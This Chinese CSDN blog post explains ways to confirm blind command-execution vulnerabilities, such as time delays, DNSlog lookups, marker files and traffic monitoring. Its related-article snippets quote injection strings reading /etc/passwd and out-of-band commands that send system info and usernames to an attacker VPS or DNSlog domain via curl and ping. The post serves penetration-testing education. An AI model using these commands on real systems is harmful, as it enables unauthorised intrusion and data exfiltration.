命令执行漏洞没有回显如何证明

已于 2023-11-30 18:53:35 修改
阅读量682 收藏 3
点赞数 2
分类专栏: 渗透测试 文章标签: 网络安全
于 2023-07-19 18:52:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sgirll/article/details/131814396
版权

在实施计算机安全评估和渗透测试时,命令执行漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞执行恶意命令并获取系统权限。然而,有时候攻击者无法直接得到命令执行的回显结果。本文将介绍如何通过无回显攻击方法来证明命令执行漏洞的存在。

一、命令执行漏洞简介

PHP 中,传入代码执行或命令执行等危险函数的参数,客户端可控,同时针对该参数没有做过滤或过滤不足,导致代码执行或命令执行。通过远程访问方式传参,就叫做RCE。

简单来说:前端输入一个参数,后端当成命令去执行,客户端输入命令时,服务器没有对执行命令的函数做过滤。

二、无回显攻击方法

当攻击者无法获取命令执行的回显结果时,可以尝试以下方法来证明漏洞的存在:

  1. 时间延迟攻击:攻击者可以通过在命令中嵌入延迟操作,如sleep命令或ping命令的大量请求,来观察应用程序的响应时间。如果应用程序的响应时间与正常情况下的响应时间不同,则可以推断出命令执行漏洞的存在。

    dnslog

    DNS log(DNS日志)是由域名系统(DNS)服务器生成的记录DNS查询和响应的信息的日志文件。DNS日志对于网络管理员来说是非常重要的工具,它可以用于监视和分析网络流量、排除故障和防止安全攻击。

    利用yakit

    yakit自带dnslog平台,申请域名,执行命令,ping一下域名,

    shiro<=1.2.4

  2. 文件系统操作:通过执行文件系统操作,例如创建、修改或删除文件等,攻击者可以检查文件系统的状态来判断命令是否执行成功。例如,攻击者可以尝试创建一个特定的标识文件,并检查是否成功创建。

  3. 网络流量监测:攻击者可以借助网络流量监测工具,如Wireshark,来分析命令执行时的网络流量。通过监测网络流量中的异常请求或响应,攻击者可以间接判断命令是否执行成功。

  4. 错误消息分析:应用程序在执行命令时,可能会生成相应的错误消息。攻击者可以通过分析错误消息来判断命令执行的结果。例如,如果错误消息中包含了攻击者预期的字符串或提示信息,可以推断出命令执行成功。

三、使用无回显攻击方法的注意事项

在使用无回显攻击方法进行命令执行漏洞的证明时,需要注意以下事项:

  1. 合法性和合规性:在进行渗透测试和证明漏洞存在时,务必遵守法律和合规要求。获取合法授权,并且仅在合法的范围内进行测试。

  2. 谨慎操作:无回显攻击方法可能对目标系统造成不可逆的影响,因此在操作时要谨慎。避免对生产环境或关键系统使用演示外的测试方法。

  3. 日志记录:在进行测试时,要记录所有的操作和结果。这样在发生问题或错误时,可以追溯和分析相关的日志信息。

  4. 定期更新:随着安全技术的不断发展,新的攻击方法和防护措施也在不断出现。因此,定期更新您的渗透测试和安全技术知识。

请关注微信公众号获取最新内容。

Adler学安全
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。...文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
Owasp Top10 漏洞笔记
08-27
SQL 注入漏洞是指 Web 应用程序对用户输入数据的合理性没有明确判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询。攻击者可以通过构造特殊的请求,使 Web 应用程序执行带有附加条件的 SQL 语句,...
回显条件下的命令执行判断和利用方式研究
A_991128a的博客
08-23 285
在渗透测试、漏洞挖掘或安全研究的过程中,我们会遇到很多无回显命令执行点。面对这些无回显命令执行点,我们很难获取命令执行结果,甚至无法判断命令是否执行成功。本篇文章主要讨论面对这些无回显命令执行点时的判断和利用方法。首先我们需要知道该点是否存在命令执行漏洞,或者我们的命令是否执行成功了。这里的研判方法有很多种,最常用的是直接通过延时判断,类似我们sql注入里的时间盲注:值得一提的是,windows下并没有sleep命令,那么如何通过时间延时的方式判断windows环境下的命令执行呢?
[CTF]命令执行回显利用
cosmoslin的博客
02-21 7470
背景 exec,shell_exec等函数可以执行命令没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
2024年网络安全最全带外攻击(OOB)RCE无回显思路总结详解_请求带外攻击(oob)域名(1),学网络安全看这就完事了
最新发布
2303_79055586的博客
05-11 1043
Temp% =%Tmp% 当前活动用户临时目录。%SystemDrive% 系统安装的磁盘分区。%SystemRoot% = %Windir% WINDOWS 系统目录。#在windows中,%xxx% 的代表系统变量,常用系统变量命令。#若有的时候长度太大,cut来分割字符(第一个字符下标为1)#使用base64编码。
命令执行回显的一些姿势
zhangge3663的博客
05-31 3371
前言 最近演练遇到了拿shell后,由于是延时注入,让我极其难受。于是,学习了一下命令执行回显的一些姿势 windows环境 1.ping %USERNAME%.2plmqc.dnslog.cn 这里的%username%为用户变量 附上windows常用变量: %APPDATA% : 列出应用程序数据的默认存放位置。 %CD% : 列出当前目录。 %CLIENTNAME% : 列出联接到终端服务会话时客户端的NETBIOS名。 %CMDCMDLINE% : 列出启动当前
rce(无回显
qq_62046696的博客
07-20 4190
RCE英文全称分为远程命令执行ping和远程代码执行evel。漏洞出现的原因没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。...
带外攻击(OOB)RCE无回显思路总结详解
qq_71467825的博客
06-23 1278
向服务器提交一个payload,而服务器响应给我们相关的response信息,大家都叫他带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成。传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据。
shiro_attack:shiro反序列化进攻综合利用,包含(回显执行命令注入内存马)
03-11
shiro反序列化进攻综合利用项目基于javafx,利用shiro反序列化扩展进行回显命令执行以及注入类别内存马检出唯一密钥(SimplePrincipalCollection)cbc / gcm Tomcat / Springboot回显命令执行集成公用集合K1 / K2...
自己动手编写SQL注入漏洞扫描工具
02-16
6. **堆叠查询注入**:在单个查询中执行多个SQL命令。 在编写SQL注入扫描工具时,你需要考虑以下关键点: 1. **构造测试输入**:生成各种可能的SQL注入字符串,如单引号、双引号、分号、注释符等。 2. **异常处理**...
java反序列化漏洞利用工具
01-14
1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版...4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境
超全的命令(代码)执行漏洞回显的姿势总结(附带详细代码和测试分析过程)
记录学习,一起进步
03-05 1672
通过:重定向,dnslog外部通信,burpsuite burpcollaborator外部通信,日志监听,netcat监听,反弹shell等不同姿势突破无回显命令执行漏洞
在检测RCE漏洞时,判断RCE利用成功的方式有哪些(无回显情况)
weixin_42478365的博客
10-09 2085
第一种使用curl: curl "xxx.xxx.xxx.xxx/$(uname -a | awk '{print $1}')" 这条命令拼接了两处,第一处便是curl下我的一个vps服务器的80端口,第二处是显示内核版本。从服务器的web日志文件中看下效果: 发现操作系统的版本被拼接输出到后面,在面对没有回显的RCE或者CSRF都可以使用这个技巧。 第二种:DNSlog windows: 操作系统 盲注方式 windows %variable% linux variable 反引号 此处使用公网一个
命令执行命令执行漏洞回显如何渗透
wj33333的博客
11-21 574
命令执行漏洞回显如何渗透
RCE无回显漏洞利用
qq_32947907的博客
01-22 953
除了上面的一些常见的方式以外,还有其它的如ICMP协议外带等等。参考链接带外攻击OOB(RCE无回显骚思路总结)-腾讯云开发者社区-腾讯云不积跬步,无以至千里;不积小流,无以成江河。
【web安全】——命令执行漏洞(RCE)详解
热门推荐
Demo不是emo的博客
09-20 1万+
这个阶段需要沉定来积累经验,靶场,漏洞复现和总结经验才是当前的中心任务,所以我也想好好捋一下其他类型的漏洞,同时也分享出来,今天的内容是命令执行漏洞
CTF之萌新web学习(命令执行2)
bmth666的博客
03-24 1140
1命令执行回显情况: 判断:延时,HTTP请求,DNS请求 2控制字符串长度getshell
Day58:WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
qq_61553520的博客
03-30 1461
小迪安全-Day58:WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
怎么对exec函数进行漏洞利用,并且回显
06-13
由于exec函数是用来执行外部命令的,因此漏洞利用的方式就是通过构造恶意命令,注入到exec函数的参数中,从而执行攻击者想要的任意命令。举个例子,如果一个程序中使用了类似如下的exec函数: ``` char* cmd = "ls -l"; exec(cmd); ``` 攻击者可以构造一个恶意的cmd参数,如下所示: ``` char* cmd = "ls -l; cat /etc/passwd"; exec(cmd); ``` 这个恶意的命令执行ls -l命令,然后在其后面加上一个分号,然后再执行cat /etc/passwd命令,从而读取系统的密码文件。这种漏洞利用方式被称为命令注入攻击。 为了回显执行结果,攻击者可以将恶意命令的输出重定向到一个文件中,然后再读取文件内容。例如,攻击者可以将上面的恶意命令改为: ``` char* cmd = "ls -l > /tmp/output; cat /tmp/output"; exec(cmd); ``` 这个命令执行ls -l命令,并将输出重定向到/tmp/output文件中,然后再执行cat /tmp/output命令,从而读取文件内容并输出到控制台上。 需要注意的是,这种漏洞利用方式非常危险,攻击者可以在受攻击的系统上执行任意命令,导致系统被完全控制。因此,在编写程序时应该对exec函数传入的参数进行充分的过滤和验证,避免注入恶意命令

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adler学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值